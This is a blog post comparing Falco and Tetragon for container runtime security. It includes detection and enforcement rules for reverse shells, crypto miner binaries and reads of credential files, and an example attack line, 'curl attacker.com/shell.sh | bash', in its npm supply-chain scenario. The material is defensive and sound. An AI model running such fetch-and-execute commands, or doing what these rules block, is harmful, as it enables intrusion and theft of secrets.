DEV Community

Yash Pritwani
Yash Pritwani

Posted on • Originally published at techsaas.cloud

Falco vs Tetragon: Detection vs Enforcement for Container Runtime Security

Originally published on TechSaaS Cloud


Originally published on TechSaaS Cloud


Falco vs Tetragon: Detection vs Enforcement for Container Runtime Security

Here's an uncomfortable truth about container security: most teams deploy Falco, get a firehose of alerts, ignore 90% of them, and call it "runtime security." Meanwhile, the actual attack -- a reverse shell spawned from a compromised Node.js dependency -- fires an alert that sits in a Slack channel for 47 minutes before anyone notices.

Detection without enforcement is just expensive logging.

Cilium Tetragon changes the equation. Instead of alerting you that something bad happened, it kills the process before the bad thing completes. That's a fundamentally different security model, and after deploying both tools across dozens of production clusters, I have strong opinions about when each one belongs in your stack.

How They Actually Work

Both tools use eBPF, but in very different ways.

Falco hooks into system calls via eBPF (or a kernel module on older kernels) and evaluates them against a rules engine. When a rule matches, it generates an alert. The process continues executing. Falco is a detection tool -- it tells you something happened.

Tetragon hooks deeper. It attaches eBPF programs to kernel functions (kprobes, tracepoints, LSM hooks) and can take enforcement actions inline -- before the syscall returns to userspace. It can send SIGKILL to a process, override a syscall return value, or throttle file access. The process doesn't get to finish what it started.

The architectural difference:

Falco:    syscall → eBPF probe → userspace engine → alert → (human decides) → response
Tetragon: syscall → eBPF probe → in-kernel policy → SIGKILL (3μs) → alert
Enter fullscreen mode Exit fullscreen mode

That "human decides" gap in the Falco pipeline? That's where breaches happen.

Setting Up Falco for Real Detection

Let's be practical. Here's a Falco deployment that actually catches things, not the default config that alerts on everything:

# falco-custom-rules.yaml
- rule: Reverse Shell Detected
  desc: Detect reverse shell connections from containers
  condition: >
    spawned_process and
    container and
    ((proc.name in (bash, sh, dash, zsh)) and
     (fd.type = ipv4 or fd.type = ipv6) and
     fd.direction = out)
  output: >
    Reverse shell detected (container=%container.name
    command=%proc.cmdline connection=%fd.name
    user=%user.name image=%container.image.repository)
  priority: CRITICAL
  tags: [network, process, attack]

- rule: Crypto Miner Binary
  desc: Known crypto mining process names
  condition: >
    spawned_process and container and
    proc.name in (xmrig, minerd, minergate, cpuminer, 
                  kdevtmpfsi, kinsing)
  output: >
    Crypto miner detected (container=%container.name 
    process=%proc.name image=%container.image.repository)
  priority: CRITICAL
  tags: [process, crypto, attack]

- rule: Sensitive File Read in Container
  desc: Reading sensitive files that containers shouldn't touch
  condition: >
    open_read and container and
    (fd.name startswith /etc/shadow or
     fd.name startswith /etc/kubernetes/pki or
     fd.name startswith /run/secrets/kubernetes.io)
  output: >
    Sensitive file read (file=%fd.name container=%container.name
    command=%proc.cmdline)
  priority: WARNING
  tags: [filesystem, sensitive]
Enter fullscreen mode Exit fullscreen mode

Deploy with Helm:

helm install falco falcosecurity/falco \
  --namespace falco-system --create-namespace \
  --set falcosidekick.enabled=true \
  --set falcosidekick.config.slack.webhookurl="${SLACK_WEBHOOK}" \
  --set falcosidekick.config.alertmanager.hostport="http://alertmanager:9093" \
  --set-file falco.rules_file[0]=/path/to/falco-custom-rules.yaml
Enter fullscreen mode Exit fullscreen mode

Setting Up Tetragon for Enforcement

Now the enforcement side. Tetragon uses TracingPolicy custom resources to define what to monitor and how to respond:

apiVersion: cilium.io/v1alpha1
kind: TracingPolicy
metadata:
  name: kill-reverse-shells
spec:
  kprobes:
    - call: "tcp_connect"
      syscall: false
      args:
        - index: 0
          type: "sock"
      selectors:
        - matchBinaries:
            - operator: In
              values:
                - /bin/bash
                - /bin/sh
                - /bin/dash
                - /usr/bin/bash
                - /usr/bin/sh
          matchActions:
            - action: Sigkill
          matchNamespaces:
            - namespace: Pid
              operator: NotIn
              values:
                - "host_ns"
Enter fullscreen mode Exit fullscreen mode

This policy says: if bash, sh, or dash attempts a TCP connection inside a container (not the host namespace), kill it immediately. No alert delay. No human in the loop. The reverse shell dies before the first byte crosses the wire.

A more nuanced policy for file access:

apiVersion: cilium.io/v1alpha1
kind: TracingPolicy
metadata:
  name: protect-sensitive-files
spec:
  kprobes:
    - call: "security_file_open"
      syscall: false
      args:
        - index: 0
          type: "file"
      selectors:
        - matchArgs:
            - index: 0
              operator: Prefix
              values:
                - /etc/shadow
                - /etc/kubernetes/pki
          matchActions:
            - action: Sigkill
          matchNamespaces:
            - namespace: Pid
              operator: NotIn
              values:
                - "host_ns"
Enter fullscreen mode Exit fullscreen mode

Deploy Tetragon:

helm install tetragon cilium/tetragon \
  --namespace kube-system \
  --set tetragon.exportFilename=/var/run/cilium/tetragon/tetragon.log \
  --set tetragon.enablePolicyFilter=true \
  --set tetragon.enableMsgHandlingLatency=true
Enter fullscreen mode Exit fullscreen mode

Real Attack Scenario: The Compromised npm Package

Let's walk through a realistic attack and see how each tool responds.

The attack: A developer installs a compromised npm package that, on import, spawns a child process running curl attacker.com/shell.sh | bash.

Falco response:

  1. Detects bash spawned as child of node (rule: "Shell Spawned by Non-Shell Program")
  2. Detects outbound network connection from bash (rule: "Reverse Shell Detected")
  3. Sends alert to Slack + Alertmanager
  4. Total time from exploit to alert: ~800ms
  5. Total time from exploit to human response: 3-47 minutes (depending on alerting pipeline and on-call response)
  6. The shell has been running the entire time

Tetragon response:

  1. bash spawned as child of node -- logged but allowed (process spawn is legitimate in many apps)
  2. bash attempts TCP connection -- SIGKILL sent in ~3 microseconds
  3. Process dies. Connection never established.
  4. Event exported for audit trail
  5. Total time from exploit to containment: <1ms

The attacker got nothing. Not a single byte of data exfiltrated.

Performance Impact

Security tools that slow your workloads are security tools that get disabled. We measured both on a 50-pod Kubernetes cluster running a mixed workload (API servers, message consumers, batch jobs):

Metric No security Falco Tetragon Both
CPU overhead (per node) baseline +1.8% +0.9% +2.5%
Memory overhead (per node) baseline +180MB +95MB +260MB
Syscall latency (p99) baseline +2.1μs +0.8μs +2.7μs
Network latency (p99) baseline +0.3μs +0.2μs +0.4μs

Tetragon is measurably lighter than Falco. This surprised us initially, but it makes sense: Tetragon does its evaluation in-kernel via eBPF, while Falco copies events to a userspace process for rule evaluation. The kernel/userspace context switch adds overhead.

Both tools are light enough to run simultaneously without meaningful production impact.

When to Use Which (Or Both)

Use Falco when:

  • You need comprehensive audit logging (compliance requirements like SOC 2, PCI DSS)
  • You want visibility into container behavior before writing enforcement policies
  • Your rules need complex logic that eBPF can't express (Falco's rule engine is more flexible)
  • You're just starting with runtime security and need to understand your baseline

Use Tetragon when:

  • You know what should never happen and want to prevent it, not just detect it
  • You need sub-millisecond response to threats
  • You're running Cilium for networking (Tetragon integrates natively)
  • You want enforcement at the kernel level without a userspace bottleneck

Use both when:

  • You want defense in depth: Tetragon blocks known-bad, Falco detects unknown-suspicious
  • Compliance requires both prevention and audit trails
  • You're running a high-security workload (financial services, healthcare)

Our Recommended Architecture

For most production Kubernetes clusters, we deploy both:

┌─────────────────────────────────────────────┐
│ Kernel Level                                │
│  Tetragon eBPF → ENFORCE known threats      │
│  Falco eBPF    → DETECT suspicious activity │
└──────────────┬──────────────┬───────────────┘
               │              │
        ┌──────▼──────┐ ┌────▼──────────┐
        │ Tetragon    │ │ Falco         │
        │ Export JSON  │ │ Sidekick      │
        └──────┬──────┘ └────┬──────────┘
               │              │
        ┌──────▼──────────────▼───────────┐
        │ Loki / Elasticsearch            │
        │ (unified security event store)  │
        └──────────────┬──────────────────┘
                       │
        ┌──────────────▼──────────────────┐
        │ Grafana Dashboards + Alerts     │
        └─────────────────────────────────┘
Enter fullscreen mode Exit fullscreen mode

Tetragon handles the "never let this happen" policies (reverse shells, crypto miners, sensitive file access). Falco handles the "this looks weird, investigate" alerts (unusual process trees, unexpected network connections, privilege escalation attempts).

The Migration Path

If you're running Falco today and considering Tetragon:

  1. Deploy Tetragon in observe-only mode (no Sigkill actions) alongside Falco
  2. Run for 2 weeks. Compare Tetragon events against Falco alerts. Verify coverage overlap.
  3. Convert your highest-confidence Falco rules to Tetragon enforcement policies (start with reverse shells and crypto miners -- lowest false-positive risk)
  4. Gradually move more rules to enforcement as confidence grows
  5. Keep Falco for detection of novel threats that don't match enforcement patterns

Don't rip out Falco and replace it with Tetragon overnight. The tools are complementary, and the migration needs bake time.


Container runtime security is one of the most impactful and least implemented layers of Kubernetes security. We help teams deploy, tune, and operate runtime security at scale. Get in touch if you want to stop detecting breaches and start preventing them.

Top comments (0)